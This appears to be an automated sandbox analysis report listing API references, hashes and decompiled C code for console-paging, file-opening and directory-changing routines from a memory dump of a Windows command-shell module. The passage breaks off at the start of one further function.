0x4a74fe87
0x4a74fe87
0x4a74fe8b
0x4a74fe8c
0x4a74fe98
0x00000000
0x00000000
0x4a74fea1
0x4a74feaa
0x4a74fec3
0x4a74fec3
0x4a74fec6
0x4a74fec6
0x4a74fec9
0x4a74fec9
0x4a74fecd
0x4a74fece
0x4a74fed5
0x4a74fed8
0x4a74fedb
0x4a74fede
0x4a74feec
0x4a74fef9
0x4a74ff06
0x4a74ff12
0x4a74ff16
0x4a74ff16
0x4a74ff1a
0x4a74ff1c
0x4a74ff21
0x4a74ff28
0x4a74ff34
0x4a74ff38
0x4a74ff3a
0x4a74ff41
0x4a74ff48
0x4a74ff48
0x4a74ff41
0x00000000
0x4a74ff4a
0x4a74ff4a
0x4a74ff4a
0x4a74ff4c
0x4a74ff4f
0x4a74ff56
0x4a74ff6a
0x4a74ff6b
0x4a74ff6e
0x4a74ff74
0x4a74ff58
0x4a74ff60
0x4a74ff65
0x4a74ff65
0x4a74ff7d
0x4a74ff84
0x4a74ff84
0x4a74ffe8
0x4a74ff8f
0x4a74ff90
0x4a74ffa2
0x4a74ffae
0x4a74ffb3
0x4a74ffb9
0x4a74ffbc
0x4a74ffbd
0x4a74ffc0
0x4a74ffc0
0x4a74ffcc
0x4a74ffe1
0x4a74ffe7
0x4a74ffe7
0x00000000
0x4a74ffcc
0x4a74fff5
0x4a74fffa
0x4a74fffd
0x00000000
0x4a750002
0x4a750003
0x4a75000a
0x4a750011
0x4a750012
0x4a75001a
0x4a750021
0x4a750023
0x4a750030
0x4a750038
0x4a750038
0x4a75003e
0x4a750046
0x4a750048
0x4a75004f
0x4a750056
0x4a750056
0x4a75004f
0x4a750058
0x4a750059
0x4a75005b
0x4a75005c
0x4a750068
0x4a750068
0x4a74fe82
0x4a74fe51
0x4a74fe56
0x00000000
0x00000000
0x4a74fe59
0x4a74fe5e
0x4a74fe61
0x4a74fe70
0x00000000
0x4a74fe63
0x4a74fe63
0x4a74fe6a
0x00000000
0x4a74fe6a

APIs

_wcsupr.MSVCRT ref: 4A74FEAA
LocalFree.KERNEL32(00000000,4A76C642,00000000,00000000,00000010,4A750080,0000233F,4A731C18,00000000,4A754210,?,00000004,74EC5129,00000000), ref: 4A74FEDE
GetStdHandle.KERNEL32(000000F5), ref: 4A74FEEC
GetConsoleMode.KERNEL32 ref: 4A74FEFC
SetConsoleMode.KERNEL32 ref: 4A74FF16
GetStdHandle.KERNEL32(000000F6), ref: 4A74FF1A
GetConsoleMode.KERNEL32 ref: 4A74FF24
SetConsoleMode.KERNEL32 ref: 4A74FF38
GetStdHandle.KERNEL32(000000F6,00000000), ref: 4A74FF81
FlushConsoleInputBuffer.KERNEL32(00000000), ref: 4A74FF84
GetStdHandle.KERNEL32(000000F6,0000000A,00000001,?,00000000), ref: 4A74FF98
towupper.MSVCRT ref: 4A74FFB3
wcschr.MSVCRT ref: 4A75000A
SetConsoleMode.KERNEL32 ref: 4A750038
SetConsoleMode.KERNEL32 ref: 4A750046

Part of subcall function 4A733B03: _get_osfhandle.MSVCRT ref: 4A733B0D
Part of subcall function 4A733B03: GetFileType.KERNEL32(00000000), ref: 4A733B17

Part of subcall function 4A733AB3: _close.MSVCRT ref: 4A733AED

Strings

<noalias>, xrefs: 4A74FF43
CMD.EXE, xrefs: 4A750051

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
String ID: <noalias>$CMD.EXE
API String ID: 2015057810-1690691951
Opcode ID: f0a5ef1b1f18b52643f0589b841b3624817854d57d72bb36bb0787d0b6a999a3
Instruction ID: 732b2c575457a72b4e191dd8ae00c8ccd50f425ebcc67c2c148448f7ca903813
Opcode Fuzzy Hash: f0a5ef1b1f18b52643f0589b841b3624817854d57d72bb36bb0787d0b6a999a3
Instruction Fuzzy Hash: 6D71A172D09219AEDF20DBA8DC48ADEBFB8AF09721F124115F801F60C1DB70A949C764

Uniqueness

Uniqueness Score: -1.00%

Function 4A7397CA, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 181
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E4A7397CA(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12, void* _a16) {
				long _v8;
				long _v12;
				long _v16;
				char _v20;
				short _v28;
				short _v32;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v44;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t57;
				long _t60;
				signed int _t64;
				long _t68;
				long _t69;
				signed int _t73;
				intOrPtr* _t74;
				int _t78;
				int _t82;
				int _t84;
				signed short _t89;
				int _t98;
				char* _t103;
				signed char _t104;
				void* _t106;
				signed int _t112;
				intOrPtr _t113;
				void* _t114;
				long _t117;

				_t106 = __edx;
				_push(_t114);
				if(E4A734490(_t57, _a8) != 0) {
					__imp___get_osfhandle(_a8);
					__ebx = __eax;
					__eax =  &_v44;
					__eax = GetConsoleScreenBufferInfo(__ebx,  &_v44);
					__eflags = __eax;
					if(__eax == 0) {
						goto L20;
					} else {
						__ecx = _v32;
						_v28 = _v28 - _v32;
						__eax = _v28 - _v32 - 1;
						__eflags = __eax;
						_v12 = __eax;
					}
				}
				_v8 = _v8 & 0x00000000;
				_t12 =  &_a12; // 0x4a745268
				_t117 = E4A7398A5(_t106, _a4, E4A7325B8,  *_t12, _a16);
				_a12 = _t117;
				_a16 = 0x4a764640;
				__eflags = _t117;
				if(_t117 == 0) {
					L14:
					__eflags = _v8;
					if(_v8 != 0) {
						__eflags = _a8 - 2;
						if(__eflags != 0) {
							goto L15;
						} else {
							_push(1);
							E4A7372E9(_t103, _t114, _t117, __eflags);
							asm("int3");
							_t56 = _t103 - 0x20; // 0x4a7541f0
							_t64 = (_t56 >> 5) + 1;
							_t104 = _t103 + _t64 * 0xffffffe0;
							return  *(0x4a75487c + _t64 * 4) & 1 << _t104;
						}
					}
					L15:
					_t60 = _v8;
				} else {
					_t114 = SetConsoleMode;
					do {
						__eflags = 0;
						if(0 == 0) {
							_t103 =  &_v20;
							_t68 = E4A73453E(_t117 + _t117, _a8, _a16, _t117 + _t117, _t103);
							__eflags = _t68;
							if(_t68 == 0) {
								L21:
								_t69 = GetLastError();
								_v8 = _t69;
								goto L14;
							} else {
								__eflags = _v20 - _t117 + _t117;
								if(_v20 == _t117 + _t117) {
									goto L12;
								} else {
									goto L21;
								}
							}
						} else {
							__eflags =  *0x4a7706a4;
							if( *0x4a7706a4 != 0) {
								_t73 =  *0x4a770924; // 0x0
								__eflags = _t73 - _v12;
								if(_t73 < _v12) {
									L26:
									_t74 = _a16;
									_t103 = _t74 + _a12 * 2;
									while(1) {
										__eflags = _t74 - _t103;
										if(_t74 >= _t103) {
											break;
										}
										_t112 =  *0x4a770924; // 0x0
										__eflags = _t112 - _v12;
										if(_t112 < _v12) {
											_t113 =  *_t74;
											_t74 = _t74 + 2;
											__eflags = _t113 - 0xa;
											if(_t113 == 0xa) {
												 *0x4a770924 =  *0x4a770924 + 1;
												__eflags =  *0x4a770924;
											}
											continue;
										}
										break;
									}
									_t117 = _t74 - _a16 >> 1;
									goto L11;
								} else {
									 *0x4a770924 =  *0x4a770924 & 0x00000000;
									_t82 = GetConsoleScreenBufferInfo(0,  &_v44);
									__eflags = _t82;
									if(_t82 == 0) {
										goto L26;
									} else {
										_t84 = WriteConsoleW(0,  *0x4a770920,  *0x4a77091c,  &_v8, 0);
										__eflags = _t84;
										if(_t84 == 0) {
											goto L26;
										} else {
											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
											GetConsoleMode(0,  &_v16);
											_t89 = SetConsoleMode(0, 0);
											__imp___getch();
											SetConsoleMode(0, _v16);
											GetConsoleScreenBufferInfo(0,  &_v68);
											_push( &_v8);
											_push(_v44.dwCursorPosition);
											_push(E4A74FD20( &_v44,  &_v68));
											_push(0x20);
											_push(0);
											FillConsoleOutputCharacterW();
											_t98 = SetConsoleCursorPosition(0, _v44.dwCursorPosition);
											__eflags = (_t89 & 0x0000ffff) - 3;
											if((_t89 & 0x0000ffff) == 3) {
												E4A74E702(_t98);
												_t60 = 0;
											} else {
												goto L26;
											}
										}
									}
								}
							} else {
								_t117 = 0xa0;
								__eflags = _a12 - 0xa0;
								if(_a12 <= 0xa0) {
									_t117 = _a12;
								}
								L11:
								_t78 = WriteConsoleW(0, _a16, _t117,  &_v8, 0);
								__eflags = _t78;
								if(_t78 == 0) {
									_v8 = GetLastError();
								} else {
									L12:
									_t20 =  &_v8;
									 *_t20 = _v8 & 0x00000000;
									__eflags =  *_t20;
								}
								goto L13;
							}
						}
						goto L16;
						L13:
						_t22 =  &_a12;
						 *_t22 = _a12 - _t117;
						__eflags =  *_t22;
						_a16 = _a16 + _t117 * 2;
					} while ( *_t22 != 0);
					goto L14;
				}
				L16:
				return _t60;
				goto L38;
			}

0x4a7397ca
0x4a7397d4
0x4a7397df
0x4a7397e8
0x4a7397ee
0x4a7397f1
0x4a7397f6
0x4a7397fc
0x4a7397fe
0x00000000
0x4a739804
0x4a739804
0x4a73980c
0x4a73980e
0x4a73980e
0x4a73980f
0x4a73980f
0x4a7397fe
0x4a739815
0x4a739819
0x4a739829
0x4a73982b
0x4a73982e
0x4a739835
0x4a739837
0x4a73988c
0x4a73988c
0x4a739890
0x4a749a22
0x4a749a26
0x00000000
0x4a749a2c
0x4a749a2c
0x4a749a2e
0x4a749a33
0x4a749a34
0x4a749a3a
0x4a749a40
0x00000000
0x4a73472c
0x4a749a26
0x4a739896
0x4a739896
0x4a739839
0x4a739839
0x4a73983f
0x4a73983f
0x4a739841
0x4a7399a5
0x4a7399b3
0x4a7399b8
0x4a7399ba
0x4a7399d1
0x4a7399d1
0x4a749a1a
0x00000000
0x4a7399bc
0x4a7399bf
0x4a7399c2
0x00000000
0x4a7399c8
0x00000000
0x4a7399c8
0x4a7399c2
0x4a739847
0x4a739847
0x4a73984e
0x4a74991d
0x4a749922
0x4a749925
0x4a7499c9
0x4a7499c9
0x4a7499cf
0x4a7499f0
0x4a7499f0
0x4a7499f2
0x00000000
0x00000000
0x4a7499d4
0x4a7499da
0x4a7499dd
0x4a7499df
0x4a7499e3
0x4a7499e4
0x4a7499e8
0x4a7499ea
0x4a7499ea
0x4a7499ea
0x00000000
0x4a7499e8
0x00000000
0x4a7499dd
0x4a7499f9
0x00000000
0x4a74992b
0x4a74992b
0x4a749937
0x4a74993d
0x4a74993f
0x00000000
0x4a749945
0x4a749958
0x4a74995e
0x4a749960
0x00000000
0x4a749962
0x4a74996b
0x4a749976
0x4a74997f
0x4a749981
0x4a74998e
0x4a749995
0x4a74999e
0x4a74999f
0x4a7499af
0x4a7499b0
0x4a7499b2
0x4a7499b3
0x4a7499bd
0x4a7499c3
0x4a7499c7
0x4a749a0e
0x4a749a13
0x00000000
0x00000000
0x00000000
0x4a7499c7
0x4a749960
0x4a74993f
0x4a739854
0x4a739854
0x4a739859
0x4a73985c
0x4a73985e
0x4a73985e
0x4a739861
0x4a73986c
0x4a739872
0x4a739874
0x4a749a06
0x4a73987a
0x4a73987a
0x4a73987a
0x4a73987a
0x4a73987a
0x4a73987a
0x00000000
0x4a739874
0x4a73984e
0x00000000
0x4a73987e
0x4a73987e
0x4a73987e
0x4a73987e
0x4a739887
0x4a739887
0x00000000
0x4a73983f
0x4a739899
0x4a73989d
0x00000000

APIs

Part of subcall function 4A734490: _get_osfhandle.MSVCRT ref: 4A73449A
Part of subcall function 4A734490: GetFileType.KERNEL32(00000000), ref: 4A7344A9

_get_osfhandle.MSVCRT ref: 4A7397E8
GetConsoleScreenBufferInfo.KERNEL32 ref: 4A7397F6
GetLastError.KERNEL32(?,4A764640,00000000,?,?,4A7325B8,hRtJ:#,?,?,?,?,?,4A736D61,00000000,00000002,0000233A), ref: 4A7399D1

Part of subcall function 4A7398A5: FormatMessageW.KERNEL32(00001A00,00000000,0000013D,00000000,4A764640,00002000,00000000,00000000,74EC14B9,00000000), ref: 4A7398EC
Part of subcall function 4A7398A5: FormatMessageW.KERNEL32(00001800,00000000,0000013D,00000000,4A764640,00002000,?,4A764640,00000025), ref: 4A739943

WriteConsoleW.KERNEL32 ref: 4A73986C
GetConsoleScreenBufferInfo.KERNEL32 ref: 4A749937
WriteConsoleW.KERNEL32 ref: 4A749958
GetStdHandle.KERNEL32(000000F6,?,?,?,?,4A736D61,00000000,00000002,0000233A,?,?,?,4A745268,0000233A,00000000), ref: 4A749964
FlushConsoleInputBuffer.KERNEL32(00000000), ref: 4A74996B
GetConsoleMode.KERNEL32 ref: 4A749976
SetConsoleMode.KERNEL32 ref: 4A74997F
_getch.MSVCRT ref: 4A749981
SetConsoleMode.KERNEL32 ref: 4A74998E
GetConsoleScreenBufferInfo.KERNEL32 ref: 4A749995
FillConsoleOutputCharacterW.KERNEL32(00000000,00000020,00000000,?,?), ref: 4A7499B3
SetConsoleCursorPosition.KERNEL32 ref: 4A7499BD

Strings

hRtJ:#, xrefs: 4A739819

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Console$Buffer$InfoModeScreen$FormatMessageWrite_get_osfhandle$CharacterCursorErrorFileFillFlushHandleInputLastOutputPositionType_getch
String ID: hRtJ:#
API String ID: 3481465048-153624809
Opcode ID: 672c57fd1c5b932a8924f7be3cf3fdcd63cbfea995793838277f0e5338020dbb
Instruction ID: e8075e136d48caef86a29306f91ba62e4d9826b4b98522eebb1f4cf29b086bba
Opcode Fuzzy Hash: 672c57fd1c5b932a8924f7be3cf3fdcd63cbfea995793838277f0e5338020dbb
Instruction Fuzzy Hash: 1E6151B2A05209EFDF60DFA0CD89AEE7BBCEB45352F124515E902D6442D770DE58CB60

Uniqueness

Uniqueness Score: -1.00%

Function 4A733A0A, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 168
fileCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E4A733A0A(WCHAR* _a4, signed int _a8, long _a12) {
				long _v8;
				signed int _v12;
				void _v16;
				long _v20;
				struct _SECURITY_ATTRIBUTES _v32;
				int _t49;
				long _t51;
				void* _t55;
				void* _t73;
				void* _t77;
				long _t79;

				_t79 = 0;
				_t49 = _a8 & 0x00000003;
				_v32.bInheritHandle = 1;
				_v32.lpSecurityDescriptor = 0;
				_v32.nLength = 0xc;
				if(_t49 > 2) {
					L13:
					return _t49 | 0xffffffff;
				}
				if((_a8 & 1) != 0) {
					if((_a8 & 0x00000008) == 0) {
						goto L2;
					}
					goto L13;
				}
				L2:
				if(_t49 != _t79) {
					_v12 = 0x40000000;
					__imp___wcsicmp(_a4, "con");
					if(_t49 != 0) {
						_a12 = 1;
					}
					_push(2);
				} else {
					_v12 = 0x80000000;
					_push(3);
				}
				_pop(_t51);
				_push(_t79);
				if(_a8 == 0x10a) {
					_t55 = CreateFileW(_a4, _v12 | 0x80000000, _a12,  &_v32, 3, 0x80, ??);
					_t73 = _t55;
					if(_t73 == 0xffffffff) {
						_t55 = CreateFileW(_a4, _v12, _a12,  &_v32, 4, 0x80, 0);
						_t73 = _t55;
						if(_t73 != 0xffffffff) {
							goto L15;
						}
						goto L23;
					}
					L15:
					_t79 = 0;
					goto L6;
				} else {
					_t55 = CreateFileW(_a4, _v12, _a12,  &_v32, _t51, 0x80, ??);
					_t73 = _t55;
					if(_t73 == 0xffffffff) {
						L23:
						_t49 = GetLastError();
						 *0x4a754128 = _t49;
						if(_t49 != 0x6e) {
							goto L13;
						}
						 *0x4a754128 = 2;
						goto L13;
					}
					L6:
					__imp___open_osfhandle(8);
					_t77 = _t73;
					_a12 = _t55;
					if((_a8 & 0x00000008) != 0) {
						if(E4A733B03(_t55, _t77, _t55) == 0 && GetFileSize(_t73, _t79) != 0) {
							_v8 = _v8 | 0xffffffff;
							_v16 = _t79;
							if(SetFilePointer(_t73, 0xffffffff,  &_v8, 2) == 0xffffffff) {
								_t49 = GetLastError();
								 *0x4a754128 = _t49;
								if(_t49 == _t79) {
									goto L19;
								}
								if(_a12 == 0xffffffff) {
									_t49 = CloseHandle(_t73);
								} else {
									__imp___close(_a12);
								}
								goto L13;
							}
							L19:
							if(ReadFile(_t73,  &_v16, 1,  &_v20, _t79) == 0) {
								_v8 = _t79;
								SetFilePointer(_t73, _t79,  &_v8, 2);
							}
							if(_v16 == 0x1a) {
								_v8 = _v8 | 0xffffffff;
								SetFilePointer(_t73, 0xffffffff,  &_v8, 2);
							}
						}
					}
					E4A733B3E(_a12);
					return _a12;
				}
			}

0x4a733a1b
0x4a733a1d
0x4a733a20
0x4a733a23
0x4a733a26
0x4a733a30
0x4a734abf
0x00000000
0x4a734abf
0x4a733a39
0x4a734ab9
0x00000000
0x00000000
0x00000000
0x4a734ab9
0x4a733a3f
0x4a733a46
0x4a734a98
0x4a734a9f
0x4a734aa9
0x4a734aab
0x4a734aab
0x4a734aae
0x4a733a4c
0x4a733a4c
0x4a733a4f
0x4a733a4f
0x4a733a58
0x4a733a59
0x4a733a5a
0x4a73d668
0x4a73d66a
0x4a73d66f
0x4a73d8ef
0x4a73d8f1
0x4a73d8f6
0x00000000
0x00000000
0x00000000
0x4a73d8f6
0x4a73d675
0x4a73d675
0x00000000
0x4a733a60
0x4a733a73
0x4a733a79
0x4a733a7e
0x4a73d8fc
0x4a73d8fc
0x4a73d902
0x4a73d90a
0x00000000
0x00000000
0x4a749ace
0x00000000
0x4a749ace
0x4a733a84
0x4a733a87
0x4a733a92
0x4a733a93
0x4a733a96
0x4a73d684
0x4a73d6a0
0x4a73d6ad
0x4a73d6b5
0x4a749add
0x4a749ae3
0x4a749aea
0x00000000
0x00000000
0x4a749af4
0x4a749b06
0x4a749af6
0x4a749af9
0x4a749aff
0x00000000
0x4a749af4
0x4a73d6bb
0x4a73d6cf
0x4a749b19
0x4a749b1c
0x4a749b1c
0x4a73d6da
0x4a749b23
0x4a749b30
0x4a749b30
0x4a73d6da
0x4a73d684
0x4a733a9f
0x00000000
0x4a733aa4

APIs

CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000080,00000000), ref: 4A733A73
_open_osfhandle.MSVCRT ref: 4A733A87
_wcsicmp.MSVCRT ref: 4A734A9F
CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000080,00000000), ref: 4A73D668
GetFileSize.KERNEL32(00000000,00000000,00000000,00008000), ref: 4A73D68C
SetFilePointer.KERNEL32(00000000,000000FF,000000FF,00000002), ref: 4A73D6B0
ReadFile.KERNEL32(00000000,00000008,00000001,?,00000000), ref: 4A73D6C7
GetLastError.KERNEL32 ref: 4A73D8FC
SetFilePointer.KERNEL32(00000000,000000FF,000000FF,00000002), ref: 4A749B30

Strings

con, xrefs: 4A734A90

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CreatePointer$ErrorLastReadSize_open_osfhandle_wcsicmp
String ID: con
API String ID: 2187688666-4257191772
Opcode ID: 68f7a3c0a6b505178967bd43ed0b9bc592dba943eeb210a707506d1da211d27b
Instruction ID: 0709471d4227617c090d8388a7f83b8deb8a223cc4550aa0a7f32d278546ba9f
Opcode Fuzzy Hash: 68f7a3c0a6b505178967bd43ed0b9bc592dba943eeb210a707506d1da211d27b
Instruction Fuzzy Hash: B051CDB2948649BADB308FA1CC49A9F3FBCEB05371F128615F925E61C2D7708A48CB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A737010, Relevance: 25.7, APIs: 17, Instructions: 230
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E4A737010(WCHAR* __ebx, long __edi, long __esi, void* __eflags) {
				intOrPtr _t54;
				WCHAR* _t58;
				WCHAR* _t62;
				short _t67;
				long _t70;
				short _t71;
				long _t75;
				intOrPtr* _t82;
				WCHAR* _t86;
				signed int _t101;
				long _t102;
				WCHAR* _t112;
				short _t113;
				intOrPtr _t117;
				WCHAR* _t121;
				short* _t123;
				void* _t126;
				void* _t137;

				_t125 = __esi;
				_t124 = __edi;
				_t111 = __ebx;
				_push(0x228);
				_push(0x4a737238);
				E4A7313E1(__ebx, __edi, __esi);
				_t112 =  *(_t126 + 8);
				_t54 =  *0x4a770664; // 0x5c
				if( *_t112 == _t54) {
					if(_t112[1] != _t54) {
						goto L2;
					}
					goto L32;
				} else {
					L2:
					_t111 = E4A7319D6(_t112);
					 *(_t126 - 0x234) = _t111;
					if(_t111 == 0) {
						L36:
						_push(8);
						L37:
						L32:
						return E4A7313CA(_t111, _t124, _t125);
					}
					 *(_t126 - 4) =  *(_t126 - 4) & 0x00000000;
					_t58 = _t111;
					_t5 =  &(_t58[1]); // 0x2
					_t123 = _t5;
					do {
						_t113 =  *_t58;
						_t58 =  &(_t58[1]);
					} while (_t113 != 0);
					_t62 =  &(_t111[_t58 - _t123 >> 1]);
					while(1) {
						 *(_t126 - 0x230) = _t62;
						if(_t62 <= _t111) {
							break;
						}
						_t9 = _t62 - 2; // -2
						_t121 = _t9;
						if( *_t121 == 0x20) {
							_t62 = _t121;
							continue;
						}
						break;
					}
					 *_t62 = 0;
					_t124 = 0x104;
					GetCurrentDirectoryW(0x104, _t126 - 0x22c);
					_t125 = towupper;
					 *(_t126 - 0x238) = towupper( *(_t126 - 0x22c)) & 0x0000ffff;
					_t67 = 0x3d;
					 *((short*)(_t126 - 0x24)) = _t67;
					if(iswalpha( *_t111 & 0x0000ffff) == 0 || _t111[1] != 0x3a) {
						_t70 =  *(_t126 - 0x238);
					} else {
						_t70 = towupper( *_t111 & 0x0000ffff);
					}
					 *(_t126 - 0x22) = _t70;
					_t71 = 0x3a;
					 *((short*)(_t126 - 0x20)) = _t71;
					 *((short*)(_t126 - 0x1e)) = 0;
					_t75 = GetFullPathNameW(_t111, _t124, _t126 - 0x22c, _t126 - 0x230);
					if(_t75 == 0) {
						L39:
						_t125 = GetLastError();
						goto L40;
					} else {
						if(_t75 > _t124) {
							L41:
							_push(0xfffffffe);
							_push(_t126 - 0x10);
							_push(0x4a7540ac);
							L4A75219B();
							goto L32;
						}
						if( *(_t126 - 0x22c) == 0 ||  *((short*)(_t126 - 0x22a)) != 0x3a) {
							_push(0xfffffffe);
							_push(_t126 - 0x10);
							_push(0x4a7540ac);
							L4A75219B();
							_push(3);
							goto L37;
						} else {
							_t82 = _t126 - 0x22c;
							_t23 = _t82 + 2; // 0x2
							_t122 = _t23;
							do {
								_t117 =  *_t82;
								_t82 = _t82 + 2;
							} while (_t117 != 0);
							_t86 = _t126 + (_t82 - _t122 >> 1) * 2 - 0x22c;
							while(1) {
								L18:
								 *(_t126 - 0x230) = _t86;
								if(_t86 <= _t126 - 0x226) {
									break;
								}
								_t29 = _t86 - 2; // -4
								_t112 = _t29;
								_t137 =  *_t112 -  *0x4a770664; // 0x5c
								if(_t137 == 0) {
									goto L1;
								}
								break;
							}
							 *_t86 = 0;
							_t125 = GetFileAttributesW;
							if(GetFileAttributesW(_t126 - 0x22c) == 0xffffffff) {
								_t111 = GetLastError();
								if(_t111 == 2 || _t111 == 3 || _t111 == 0x7b) {
									_t111 =  *(_t126 - 0x234);
									goto L21;
								} else {
									_push(0xfffffffe);
									_push(_t126 - 0x10);
									_push(0x4a7540ac);
									L4A75219B();
									goto L32;
								}
							}
							L21:
							if( *0x4a754081 == 0 || E4A736E47(_t126 - 0x22c, _t124, 0) != 0) {
								if( *((intOrPtr*)(_t126 + 0xc)) == 2) {
									L26:
									if( *((intOrPtr*)(_t126 + 0xc)) == 0 ||  *((intOrPtr*)(_t126 + 0xc)) == 1 &&  *(_t126 - 0x238) ==  *(_t126 - 0x22)) {
										if(SetCurrentDirectoryW(_t126 - 0x22c) == 0) {
											goto L39;
										}
										goto L30;
									} else {
										L30:
										if(E4A731730(_t126 - 0x24, _t126 - 0x22c) != 0) {
											_push(0xfffffffe);
											_push(_t126 - 0x10);
											_push(0x4a7540ac);
											L4A75219B();
											goto L36;
										}
										E4A732C56(_t111, _t122, _t124, 0x4a755260, _t124, 0);
										 *(_t126 - 4) = 0xfffffffe;
										E4A737259(_t111);
										goto L32;
									}
								}
								_t101 = GetFileAttributesW(_t126 - 0x22c);
								if(_t101 == 0xffffffff) {
									_t102 = GetLastError();
									_t125 = _t102;
									if(_t102 == 2) {
										_t125 = 3;
									}
									L40:
									_push(0xfffffffe);
									_push(_t126 - 0x10);
									_push(0x4a7540ac);
									L4A75219B();
									goto L32;
								}
								if((_t101 & 0x00000410) == 0) {
									_push(0xfffffffe);
									_push(_t126 - 0x10);
									_push(0x4a7540ac);
									L4A75219B();
									goto L32;
								}
								goto L26;
							} else {
								goto L41;
							}
						}
					}
				}
				L1:
				_t86 = _t112;
				goto L18;
			}

0x4a737010
0x4a737010
0x4a737010
0x4a737010
0x4a737015
0x4a73701a
0x4a73701f
0x4a737022
0x4a73702b
0x4a73c15f
0x00000000
0x00000000
0x00000000
0x4a737031
0x4a737031
0x4a737037
0x4a737039
0x4a737041
0x4a749f11
0x4a749f11
0x4a749f13
0x4a737229
0x4a73722e
0x4a73722e
0x4a737047
0x4a73704b
0x4a73704d
0x4a73704d
0x4a737050
0x4a737050
0x4a737054
0x4a737055
0x4a73705e
0x4a737061
0x4a737061
0x4a737069
0x00000000
0x00000000
0x4a73706b
0x4a73706b
0x4a737072
0x4a749f19
0x00000000
0x4a749f19
0x00000000
0x4a737072
0x4a73707a
0x4a737084
0x4a73708a
0x4a737096
0x4a7370a1
0x4a7370a9
0x4a7370aa
0x4a7370bc
0x4a74055a
0x4a7370cd
0x4a7370d1
0x4a7370d3
0x4a7370d4
0x4a7370da
0x4a7370db
0x4a7370e1
0x4a7370f5
0x4a7370fd
0x4a749f20
0x4a749f26
0x00000000
0x4a737103
0x4a737105
0x4a749f42
0x4a749f42
0x4a749f47
0x4a749f48
0x4a749f4d
0x00000000
0x4a749f55
0x4a737113
0x4a749fe5
0x4a749fea
0x4a749feb
0x4a749ff0
0x4a749ff8
0x00000000
0x4a737127
0x4a737127
0x4a73712d
0x4a73712d
0x4a737130
0x4a737130
0x4a737134
0x4a737135
0x4a73713e
0x4a737145
0x4a737145
0x4a737145
0x4a737153
0x00000000
0x00000000
0x4a737155
0x4a737155
0x4a73715b
0x4a737162
0x00000000
0x00000000
0x00000000
0x4a737162
0x4a73716a
0x4a737174
0x4a73717f
0x4a749f65
0x4a749f6a
0x4a749f90
0x00000000
0x4a749f76
0x4a749f76
0x4a749f7b
0x4a749f7c
0x4a749f81
0x00000000
0x4a749f89
0x4a749f6a
0x4a737185
0x4a73718c
0x4a7371a9
0x4a7371c8
0x4a7371cc
0x4a7371f0
0x00000000
0x00000000
0x00000000
0x4a7371f6
0x4a7371f6
0x4a737208
0x4a749fcd
0x4a749fd2
0x4a749fd3
0x4a749fd8
0x00000000
0x4a749fdd
0x4a737216
0x4a73721b
0x4a737222
0x00000000
0x4a737227
0x4a7371cc
0x4a7371b2
0x4a7371b7
0x4a749f9b
0x4a749fa1
0x4a749fa6
0x4a749faa
0x4a749faa
0x4a749f28
0x4a749f28
0x4a749f2d
0x4a749f2e
0x4a749f33
0x00000000
0x4a749f3b
0x4a7371c2
0x4a749fb0
0x4a749fb5
0x4a749fb6
0x4a749fbb
0x00000000
0x4a749fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x4a73718c
0x4a737113
0x4a7370fd
0x4a732ccf
0x4a732ccf
0x00000000

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6,00000000,00000001,00000000,00000000,4A7372F5,00000000), ref: 4A73708A
towupper.MSVCRT ref: 4A73709C
iswalpha.MSVCRT ref: 4A7370B2
towupper.MSVCRT ref: 4A7370D1
GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,?,?,4A736D61,00000000,00000002,0000233A,?), ref: 4A7370F5
GetFileAttributesW.KERNEL32(00000000), ref: 4A73717A
GetFileAttributesW.KERNEL32(00000000), ref: 4A7371B2
SetCurrentDirectoryW.KERNEL32(00000000), ref: 4A7371E8
_local_unwind4.MSVCRT ref: 4A749FBB

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesCurrentDirectoryFiletowupper$FullNamePath_local_unwind4iswalpha
String ID:
API String ID: 1128778107-0
Opcode ID: aff3b660699e43f62688c14ad80851cf6772b7e8f63f4275a466c3a8a80cacf2
Instruction ID: 12bd07873c4432ead2c9de2d47f96ea3536e3cb7f91fe8d5a0238139a68f9d21
Opcode Fuzzy Hash: aff3b660699e43f62688c14ad80851cf6772b7e8f63f4275a466c3a8a80cacf2
Instruction Fuzzy Hash: 4881DA72909119EADB70DBE0DC48AED7BB8EF45320F1241A5F915DB582E734CA4CCB61

Uniqueness

Uniqueness Score: -1.00%

Function 4A7372E9, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 220
threadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E4A7372E9(void* __ecx, void* __edi, void* __esi, void* __eflags, int _a4) {
				char _v13;
				signed int _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v32;
				char _v48;
				void* _v97;
				void* __ebp;
				void* _t40;
				char* _t44;
				int _t49;
